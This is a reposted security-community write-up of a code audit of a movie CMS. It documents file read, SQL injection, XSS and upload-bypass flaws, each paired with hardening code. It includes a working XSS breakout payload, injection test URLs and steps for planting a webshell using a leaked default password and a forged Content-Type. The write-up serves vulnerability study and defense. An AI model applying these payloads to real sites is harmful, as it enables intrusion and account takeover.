Notes from a first audit of a movie CMS

2019-05-09 · about 1744 words · estimated reading time 4 minutes

Notice: this article, "Notes from a first audit of a movie CMS", was first published by its author threst on 2019-05-09 08:22:00 on the 先知社区 (Xianzhi Community), where it had been viewed 203 times.

Thanks to threst for the hard work!

I recently came across a code audit write-up by 皮师傅 (Master Pi) on secquan and thought it was pretty good, so I downloaded the source to have a look myself. After an afternoon of auditing I found a few low-value bugs; I'm writing this up as a record of my first code audit.

File read (of limited use)

like.php

Location: data/like.php

Key code:

$fang=$_GET['play'];                 // attacker-controlled, base64-encoded
$jmfang=base64_decode($fang);        // decoded value may be a URL, a local path or a stream wrapper
$like=file_get_contents($jmfang);    // read without any scheme or path check
$likezz="/<ul class='s-guess-list g-clear js-list' data-block='tj-guess' monitor-desc=\"猜你喜欢\">(.*?)<\/ul>/is";
$kikez1="/ <img src=\"(.*?)\" data-src='(.*?)'>
            <\/a>
            <div class='s-guess-right'>
                <p class='title'><a href='(.*?)' data-index=(.*?)>(.*?)<\/a><\/p>
            <\/div>
/is";

// The fetched content is only ever shown through these regexes, which is why
// an arbitrary file is read but not displayed verbatim.
preg_match_all($likezz, $like,$likearr);
preg_match_all($kikez1, $likearr['1']['0'],$liketitle);
... omitted ...

Pass the play parameter directly and the file is read.

[Screenshot: reading a file]

The file can be read, it just isn't displayed, because like.php post-processes whatever it reads and only outputs it in a fixed format. The file read in fenlei.php that Master Pi found is better, so I won't go over it here.

play.php has the same pattern:

<?php
error_reporting(0);
$player = base64_decode($_GET['play']);   // same unchecked, base64-encoded input
$tvinfo = file_get_contents($player);     // same unrestricted read
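As an added example (not the CMS's own code), this is how the play parameter read in like.php and play.php can be guarded: decode strictly, then only allow http(s) URLs to an allowlisted host. ALLOWED_HOSTS is an assumed configuration value.

```php
<?php
// Added example, not the CMS's own code: a guarded replacement for
//   $tvinfo = file_get_contents(base64_decode($_GET['play']));
// The original fetches whatever the decoded value names, so local paths and
// stream wrappers (file://, php://) are reachable. This version accepts only
// http(s) URLs whose host is on an allowlist. ALLOWED_HOSTS is assumed config.
const ALLOWED_HOSTS = ['v.example.com']; // assumption: the upstream video site

// Decode the play parameter and return a URL that passed every check, else null.
function safe_play_url(string $encoded): ?string
{
    $decoded = base64_decode($encoded, true);      // strict: reject non-base64
    if ($decoded === false || strpos($decoded, "\0") !== false) {
        return null;
    }
    $p = parse_url($decoded);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return null;                               // bare paths have no scheme/host
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return null;                               // blocks file://, php://, data:, ftp://
    }
    if (!in_array(strtolower($p['host']), ALLOWED_HOSTS, true)) {
        return null;
    }
    if (isset($p['user']) || isset($p['pass']) || isset($p['port'])) {
        return null;                               // no credentials, no odd ports
    }
    return $decoded;
}

$url = safe_play_url($_GET['play'] ?? '');
if ($url === null) {
    http_response_code(400);
    exit('invalid play parameter');
}
// A timeout keeps a slow upstream from holding the worker; allow_url_fopen must be on.
$ctx    = stream_context_create(['http' => ['timeout' => 5]]);
$tvinfo = file_get_contents($url, false, $ctx);
```

Exact host matching is deliberate: a suffix check such as "ends with example.com" is bypassed by a lookalike domain.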

SQL injection

agent/index.php

<?php
require dirname(__FILE__) . "/dzsck.php";
// $_GET['id'] is concatenated straight into both UPDATE statements.
if($_GET['type']=='Sell' and $_GET['id']!=''){
    $cm->query("UPDATE d_kami SET km_sell=1 WHERE km_id ='".$_GET['id']."'");
    echo tiao("已复制好,可贴粘。", "index.php");
    exit();
}
if($_GET['type']=='close' and $_GET['id']!=''){
    $cm->query("UPDATE d_kami SET km_sell=0 WHERE km_id ='".$_GET['id']."'");
    echo backs("卡密取消复制成功!");
    exit();
}
$cm->query("SELECT * FROM d_adminuser where admin_id='" . $_SESSION["adminid"] . "' order by admin_id asc");
$adminuser = $cm->fetch_array($rs);
$cm->query("SELECT * FROM d_kami where km_uid='" . $_SESSION["adminid"] . "' order by km_type asc");
$mypagesnum = $cm->db_num_rows();
?>
... omitted ...

As you can see, the id parameter goes into the SQL statement without any filtering. Since this is the agent feature, you first need to register as an agent; plain registration is enough.

Payload: http://192.168.0.100/tuana/agent/index.php?type=Sell&id=123

[Screenshot: time-based blind injection]

The same injection exists at:

http://192.168.0.100/tuana/agent/index.php?type=close&id=123
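As an added example (not the CMS's own code), here is the km_sell update from agent/index.php rewritten with a PDO prepared statement; the DSN, credentials and the $pdo handle are assumptions, and the km_uid condition is extra hardening based on the km_uid filter the page's own listing query already uses.

```php
<?php
// Added example, not the CMS's own code: the km_sell update from
// agent/index.php with a prepared statement. The original splices
// $_GET['id'] into the SQL string; with a bound parameter the value is
// sent separately from the query text and can never end the literal.
// The DSN and credentials are placeholders.
session_start();
$pdo = new PDO('mysql:host=localhost;dbname=<DB_NAME>;charset=utf8mb4',
               '<DB_USER>', '<DB_PASS>',
               [PDO::ATTR_EMULATE_PREPARES => false,
                PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION]);

// Set km_sell for one card and return the number of rows changed.
// The km_uid condition ties the update to the logged-in agent, mirroring
// the km_uid filter the original page already applies when listing cards.
function set_card_sell(PDO $pdo, string $id, int $agentId, bool $sell): int
{
    $stmt = $pdo->prepare(
        'UPDATE d_kami SET km_sell = :sell WHERE km_id = :id AND km_uid = :uid'
    );
    $stmt->bindValue(':sell', $sell ? 1 : 0, PDO::PARAM_INT);
    $stmt->bindValue(':id',   $id,           PDO::PARAM_STR);
    $stmt->bindValue(':uid',  $agentId,      PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Same dispatch as the original type=Sell / type=close branches.
$type = $_GET['type'] ?? '';
$id   = $_GET['id']   ?? '';
if ($id !== '' && ($type === 'Sell' || $type === 'close')) {
    $changed = set_card_sell($pdo, $id, (int)($_SESSION['adminid'] ?? 0), $type === 'Sell');
    // 0 rows: no such card, or it belongs to another agent.
    echo $changed === 1 ? 'ok' : 'no such card';
    exit();
}
```

With emulated prepares disabled the MySQL server receives the statement and the parameters separately, so quoting in id cannot change the query structure regardless of charset.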

XSS

payreturn.php

$orderid = $_GET["orderid"];
//$isql="update d_ddcenter set dd_type=1 where dd_order='".$orderid."'";
//$ddinfo=mysql_query($isql);
//$cm->query("SELECT * FROM d_ddcenter where dd_order='" . $orderid . "'");
//$row = $cm->fetch_array($rs);
//$dd_adminid=$row['dd_adminid'];
echo $orderid;   // reflected into the page without encoding
$cm->query("SELECT * FROM d_ddcenter where dd_order='" . $orderid . "' order by dd_id desc");
$km_number = $cm->fetch_array($rs);
$cm->query("SELECT * FROM d_adminuser where admin_id='" . $km_number["dd_adminid"] . "'    ");
$km_number3 = $cm->fetch_array($rs);
if($km_number["dd_vip"]==1){
    if( $km_number3['admin_endtime']<time())$ddvip = $cm->query("UPDATE d_adminuser SET admin_endtime=".time()."+2678400,admin_level=1,admin_opentime='".$nowtime."' WHERE admin_id='" . $km_number["dd_adminid"] . "'");
    else $ddvip = $cm->query("UPDATE d_adminuser SET admin_endtime=admin_endtime+2678400,admin_level=1,admin_opentime='".$nowtime."' WHERE admin_id='" . $km_number["dd_adminid"] . "'");
}
... omitted ...

The incoming orderid parameter is echoed straight back: an obvious XSS.

XSS 2

admin/edituser.php

<?php
require dirname(__FILE__) . "/dzsck.php";
if (($_GET["type"] == "edit") && $_POST) {
    $date = array("admin_aglevel" => $_POST["admin_aglevel"]);
    $updates = $cm->cmupdate($date, "admin_id='" . $_POST["id"] . "'", "d_adminuser");
    if($updates)
    {
        echo tiao("修改成功!", "edituser.php?id=" . $_POST["id"]);
        exit();
    }
    else{
        echo tiao("修改失败,请重新修改!", "edituser.php?id=" . $_POST["id"]);
        exit();
    }
}

Here the POSTed id is output without any processing, which looks like an XSS, so let's try it.

Inserting an XSS payload directly doesn't work; the response comes out like this:

<script type='text/javascript'>alert('修改成功!');location.replace('edituser.php?id=<script>alert(/xss/)</script>');</script>

Looking closer, edituser.php?id= is concatenated with the contents of $_POST["id"] and then followed by the trailing ');</script>. To work around that, try changing the POST body to admin_aglevel=1&id=123</script>');<script>alert(/xss/)</script>('

XSS succeeds.
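As an added example (not the CMS's own code) covering both XSS cases above, this shows context-appropriate output encoding: HTML escaping for the echoed orderid in payreturn.php, and a JavaScript string literal built with json_encode for the redirect that tiao() emits in edituser.php. tiao()'s exact implementation is not on the page; safe_tiao() is written here to reproduce the alert/location.replace output shown above.

```php
<?php
// Added example, not the CMS's own code: output encoding for the two XSS
// cases. safe_tiao() reproduces the
//   <script>alert('...');location.replace('...');</script>
// response seen from edituser.php, with both strings encoded for a JS context.

// HTML context (payreturn.php: echo $orderid).
function html_escape(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// JavaScript string context. json_encode yields a quoted JS string literal;
// the HEX flags turn < > ' " & into \u00XX escapes, so neither a quote nor a
// closing </script> inside $s can end the literal or the script block.
function js_string(string $s): string
{
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
                           | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE) ?: '""';
}

function safe_tiao(string $msg, string $url): string
{
    return "<script type='text/javascript'>alert(" . js_string($msg)
         . ");location.replace(" . js_string($url) . ");</script>";
}

// payreturn.php: the reflected order id.
$orderid = $_GET['orderid'] ?? '';
echo html_escape($orderid);

// edituser.php: the redirect target built from $_POST['id']. The id is also
// URL-encoded, since it is a query-string value inside that URL.
$id = $_POST['id'] ?? '';
echo safe_tiao('修改成功!', 'edituser.php?id=' . rawurlencode($id));
```

With the page's payload as id, the "</script>" fragment is emitted as "\u003C/script\u003E" inside a JS string, so the browser never sees a closing tag; if admin_id is numeric, casting id with (int) before use is the simpler option.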

File upload

Following index.php:

<?php
// $passwd, $max_file_size, $uptypes, $destination_folder and $overwrite are
// presumably set by the included configuration (not shown). The error strings
// were mis-encoded (GBK) in the source; English equivalents are substituted.
if(is_array($_FILES["upfile"])){
    $i=0;
    if($_POST['pwd'] != $passwd){
        echo '<script>alert("no permission")</script>';
        exit;
    }
    while($i<count($_FILES["upfile"])){
        if ($_SERVER['REQUEST_METHOD'] == 'POST')
        {
            // was the file actually uploaded via HTTP POST?
            if (!is_uploaded_file($_FILES["upfile"]["tmp_name"][$i]))
            {
                // echo $_FILES["upfile"]["tmp_name"][$i];
                echo "<font color='red'>file was not uploaded</font>";
                exit;
            }
            // echo $_FILES["upfile"]["tmp_name"][$i];
            $file = $_FILES["upfile"];
            // check file size
            if($max_file_size < $file["size"][$i])
            {
                echo "<font color='red'>file too large</font>";
                exit;
            }
            // check file type: $file["type"] is the client-supplied Content-Type
            if(!in_array($file["type"][$i], $uptypes))
            {
                echo "<font color='red'>this file type cannot be uploaded</font>";
                exit;
            }
            if(!file_exists($destination_folder))
                if(!mkdir($destination_folder,0777,true)){
                    echo "<font color='red'>failed to create directory, please create it manually</font>";
                }
            $filename=$file["tmp_name"][$i];
            $image_size = getimagesize($filename);   // result is never checked
            $pinfo=pathinfo($file["name"][$i]);
            $ftype=$pinfo["extension"];               // extension taken from the upload name
            $destination = $destination_folder.$i.time().".".$ftype;
            if (file_exists($destination) && $overwrite != true)
            {
                echo "<font color='red'>a file with the same name already exists</font>";
                exit;
            }
            echo $destination;
            if(!move_uploaded_file ($filename, $destination))
            {
                echo "<font color='red'>failed to move file</font>";
                exit;
            }
            $pinfo=pathinfo($destination);
            $fname=$pinfo["basename"];

Note that uploading directly prompts for a password; fortunately the password is right there in inc/aik.config.php:

tu_pass=123456

Try uploading a phpinfo file: as expected, "wrong type". Try changing the Content-Type.

[Screenshot: upload succeeded]

Try a one-line webshell.

[Screenshot: getshell succeeded]
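As an added example (not the CMS's own code), here is a server-side upload check that does not depend on the client-supplied Content-Type, the weakness exploited above: the type is sniffed from the file bytes, the stored extension is derived from that type rather than from the upload name, and the file gets a random name. UPLOAD_DIR and MAX_SIZE are assumed configuration values.

```php
<?php
// Added example, not the CMS's own code: replaces the $_FILES["type"] check
// in index.php above. The client sets Content-Type, so that test is bypassed
// by editing one header; here the type is taken from the file bytes, the
// stored extension is derived from that type, and the name is random.
const UPLOAD_DIR = '/var/www/uploads/';   // assumption: a directory without script execution
const MAX_SIZE   = 2 * 1024 * 1024;       // assumption
// Detected MIME type => extension that will be stored. Nothing else is accepted.
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

// Validate entry $i of a multi-file $_FILES['upfile'] array and move it.
// Returns the stored name or throws.
function store_image(array $files, int $i): string
{
    if (($files['error'][$i] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error');
    }
    $tmp = $files['tmp_name'][$i];
    if (!is_uploaded_file($tmp) || $files['size'][$i] > MAX_SIZE) {
        throw new RuntimeException('not an upload or too large');
    }
    // Sniff the real type from the content, not from the client's header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('content is not an allowed image type');
    }
    // The original called getimagesize() but never checked its result.
    if (getimagesize($tmp) === false) {
        throw new RuntimeException('not a parseable image');
    }
    // Extension comes from the detected type, never from the upload name,
    // so "x.php" sent with an image Content-Type is stored as <random>.jpg.
    $dest = UPLOAD_DIR . bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    if (!move_uploaded_file($tmp, $dest)) {
        throw new RuntimeException('move failed');
    }
    chmod($dest, 0644); // readable, not executable
    return basename($dest);
}

if (isset($_FILES['upfile']) && is_array($_FILES['upfile']['name'])) {
    foreach (array_keys($_FILES['upfile']['name']) as $i) {
        try {
            echo 'stored ' . store_image($_FILES['upfile'], $i) . "\n";
        } catch (RuntimeException $e) {
            http_response_code(400);
            echo 'rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES) . "\n";
        }
    }
}
```

Pair this with a web-server rule that never executes scripts from UPLOAD_DIR, so that even a valid image carrying PHP in its metadata is only ever served as data.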

Keywords: ['security techniques', 'vulnerability analysis']


Author (reposting site): 旭达网络

This article is licensed under the Creative Commons Attribution 4.0 International License.
